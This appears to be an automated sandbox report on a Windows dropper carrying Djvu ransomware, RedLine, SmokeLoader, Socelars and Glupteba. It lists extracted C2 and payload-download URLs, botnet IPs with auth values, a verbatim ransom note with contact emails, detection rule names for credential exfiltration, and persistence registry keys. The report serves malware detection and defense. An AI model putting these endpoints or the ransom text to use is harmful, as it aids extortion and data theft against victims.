djvu | 79a20a8335e79867b1a5ee2c40041b1212299a98117e1e7958a1a068962eb704

Analysis

max time kernel
61s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
12-03-2022 20:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

79a20a8335e79867b1a5ee2c40041b1212299a98117e1e7958a1a068962eb704.exe
Size

8.1MB
MD5

9d2555bb17c8c7a62a330a14daed7033
SHA1

7c12468178c1bcd4ca7b313391afe824af7aa3fd
SHA256

79a20a8335e79867b1a5ee2c40041b1212299a98117e1e7958a1a068962eb704
SHA512

eeceba049c432d21872c8c7d6616760c0f2dbd26370ebd0ea5efa19fc141bce919f7f2180e3be1221957a4be7dc55b2703b08c477d5f8232e41f33e52532a111

Malware Config

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32

Extracted

Family

redline

Botnet

ruzkida

185.11.73.55:22201

Attributes

auth_value
000938fe0d697ca6a3b6cee46ba02ff3

Extracted

Family

djvu

http://fuyt.org/test3/get.php

Attributes

extension
.xcbg
offline_id
y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1
payload_url
http://zerit.top/dl/build2.exe
http://fuyt.org/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@sysmail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0417Jsfkjn

rsa_pubkey.plain

Extracted

Family

redline

Botnet

ruzki12_03

176.122.23.55:11768

Attributes

auth_value
c51ddc8008e8581a01cec6e8291c5530

Signatures

Detected Djvu ransomware 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2980-293-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/2980-297-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/2980-303-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/2980-291-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/408-173-0x0000000002F20000-0x0000000003847000-memory.dmp	family_glupteba
behavioral2/memory/408-174-0x0000000000400000-0x0000000002584000-memory.dmp	family_glupteba
behavioral2/memory/2564-178-0x0000000000400000-0x0000000002584000-memory.dmp	family_glupteba
behavioral2/memory/1744-190-0x0000000000400000-0x0000000002584000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rUNdlL32.eXe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4600 4972 rUNdlL32.eXe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4600	4972	rUNdlL32.eXe

RedLine Payload 7 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4740-273-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/2132-269-0x00000000003C0000-0x0000000000534000-memory.dmp	family_redline
behavioral2/memory/2132-267-0x00000000003C0000-0x0000000000534000-memory.dmp	family_redline
behavioral2/memory/2132-250-0x00000000003C0000-0x0000000000534000-memory.dmp	family_redline
behavioral2/memory/2132-246-0x00000000003C0000-0x0000000000534000-memory.dmp	family_redline
behavioral2/memory/2132-230-0x00000000003C0000-0x0000000000534000-memory.dmp	family_redline
behavioral2/memory/532-294-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

svchost.exe

description pid process target process

PID 1328 created 408 1328 svchost.exe Graphics.exe
PID 1328 created 1744 1328 svchost.exe csrss.exe
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE Danabot Key Exchange Request
suricata: ET MALWARE Danabot Key Exchange Request
suricata
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2
suricata
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2
suricata
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata
suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)
suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)
suricata
suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6
suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6
suricata
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata
Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

description	pid	process	target process
PID 1328 created 408	1328	svchost.exe	Graphics.exe
PID 1328 created 1744	1328	svchost.exe	csrss.exe

Executes dropped EXE 17 IoCs

Processes:

SoCleanInst.exemd9_1sjm.exeFolder.exeGraphics.exeUpdbdate.exeInstall.exeFiles.exepub2.exeFile.exeFolder.exejfiag3g_gg.exejfiag3g_gg.exeGraphics.execsrss.exeinjector.exeOa_1rAeU7cyuqEq9ZqIu5KWu.exe2kHl1vLDsZ4d0eTrthNntegB.exe

pid	process
456	SoCleanInst.exe
2528	md9_1sjm.exe
4272	Folder.exe
408	Graphics.exe
4548	Updbdate.exe
4544	Install.exe
3272	Files.exe
1348	pub2.exe
1968	File.exe
2132	Folder.exe
3756	jfiag3g_gg.exe
4744	jfiag3g_gg.exe
2564	Graphics.exe
1744	csrss.exe
1436	injector.exe
3680	Oa_1rAeU7cyuqEq9ZqIu5KWu.exe
1528	2kHl1vLDsZ4d0eTrthNntegB.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

File.exe79a20a8335e79867b1a5ee2c40041b1212299a98117e1e7958a1a068962eb704.exeFolder.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	File.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	79a20a8335e79867b1a5ee2c40041b1212299a98117e1e7958a1a068962eb704.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Folder.exe

Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

5012 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
5012	rundll32.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Files.exeGraphics.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex"	Files.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BoldLeaf = "\"C:\\Windows\\rss\\csrss.exe\""	Graphics.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

md9_1sjm.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md9_1sjm.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

13 ip-api.com
104 ipinfo.io
250 ipinfo.io
103 ipinfo.io
107 api.db-ip.com
108 api.db-ip.com
216 ipinfo.io
221 api.db-ip.com
249 ipinfo.io
252 api.db-ip.com
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Drops file in Windows directory 2 IoCs

Processes:

Graphics.exe

description ioc process

File opened for modification C:\Windows\rss Graphics.exe
File created C:\Windows\rss\csrss.exe Graphics.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md9_1sjm.exe

flow	ioc
13	ip-api.com
104	ipinfo.io
250	ipinfo.io
103	ipinfo.io
107	api.db-ip.com
108	api.db-ip.com
216	ipinfo.io
221	api.db-ip.com
249	ipinfo.io
252	api.db-ip.com

description	ioc	process
File opened for modification	C:\Windows\rss	Graphics.exe
File created	C:\Windows\rss\csrss.exe	Graphics.exe

Program crash 64 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
116	408	WerFault.exe	Graphics.exe
4948	408	WerFault.exe	Graphics.exe
2736	408	WerFault.exe	Graphics.exe
632	5012	WerFault.exe	rundll32.exe
4720	408	WerFault.exe	Graphics.exe
4240	408	WerFault.exe	Graphics.exe
2492	408	WerFault.exe	Graphics.exe
4028	408	WerFault.exe	Graphics.exe
3360	408	WerFault.exe	Graphics.exe
2620	408	WerFault.exe	Graphics.exe
2336	408	WerFault.exe	Graphics.exe
3604	408	WerFault.exe	Graphics.exe
4856	408	WerFault.exe	Graphics.exe
4988	408	WerFault.exe	Graphics.exe
4876	408	WerFault.exe	Graphics.exe
2492	408	WerFault.exe	Graphics.exe
808	408	WerFault.exe	Graphics.exe
2504	408	WerFault.exe	Graphics.exe
4600	408	WerFault.exe	Graphics.exe
4404	408	WerFault.exe	Graphics.exe
4372	408	WerFault.exe	Graphics.exe
1080	408	WerFault.exe	Graphics.exe
4344	2564	WerFault.exe	Graphics.exe
3464	2564	WerFault.exe	Graphics.exe
5088	2564	WerFault.exe	Graphics.exe
752	2564	WerFault.exe	Graphics.exe
1480	2564	WerFault.exe	Graphics.exe
2404	2564	WerFault.exe	Graphics.exe
1712	2564	WerFault.exe	Graphics.exe
2284	2564	WerFault.exe	Graphics.exe
5096	2564	WerFault.exe	Graphics.exe
4956	2564	WerFault.exe	Graphics.exe
2720	2564	WerFault.exe	Graphics.exe
544	2564	WerFault.exe	Graphics.exe
4984	2564	WerFault.exe	Graphics.exe
1384	2564	WerFault.exe	Graphics.exe
4240	2564	WerFault.exe	Graphics.exe
3992	2564	WerFault.exe	Graphics.exe
1308	1744	WerFault.exe	csrss.exe
4600	1744	WerFault.exe	csrss.exe
2908	1744	WerFault.exe	csrss.exe
4880	1744	WerFault.exe	csrss.exe
1504	1744	WerFault.exe	csrss.exe
1296	1744	WerFault.exe	csrss.exe
2480	1744	WerFault.exe	csrss.exe
5052	1744	WerFault.exe	csrss.exe
4860	1744	WerFault.exe	csrss.exe
4316	1744	WerFault.exe	csrss.exe
1052	1744	WerFault.exe	csrss.exe
3628	1744	WerFault.exe	csrss.exe
3360	1744	WerFault.exe	csrss.exe
3024	1744	WerFault.exe	csrss.exe
3796	1744	WerFault.exe	csrss.exe
316	1744	WerFault.exe	csrss.exe
4052	1744	WerFault.exe	csrss.exe
2268	1744	WerFault.exe	csrss.exe
4732	1744	WerFault.exe	csrss.exe
1780	1744	WerFault.exe	csrss.exe
3868	1744	WerFault.exe	csrss.exe
4920	1744	WerFault.exe	csrss.exe
3976	1744	WerFault.exe	csrss.exe
3452	1744	WerFault.exe	csrss.exe
4136	1744	WerFault.exe	csrss.exe
3060	2296	WerFault.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

pub2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe

Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

3016 schtasks.exe
3816 schtasks.exe
4048 schtasks.exe
4780 schtasks.exe
3448 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1604 timeout.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

1972 taskkill.exe
4960 taskkill.exe

pid	process
3016	schtasks.exe
3816	schtasks.exe
4048	schtasks.exe
4780	schtasks.exe
3448	schtasks.exe

pid	process
1604	timeout.exe

pid	process
1972	taskkill.exe
4960	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

Graphics.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3142 = "South Sudan Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3052 = "Qyzylorda Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2871 = "Magallanes Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1502 = "Turkey Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2891 = "Sudan Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time"	Graphics.exe
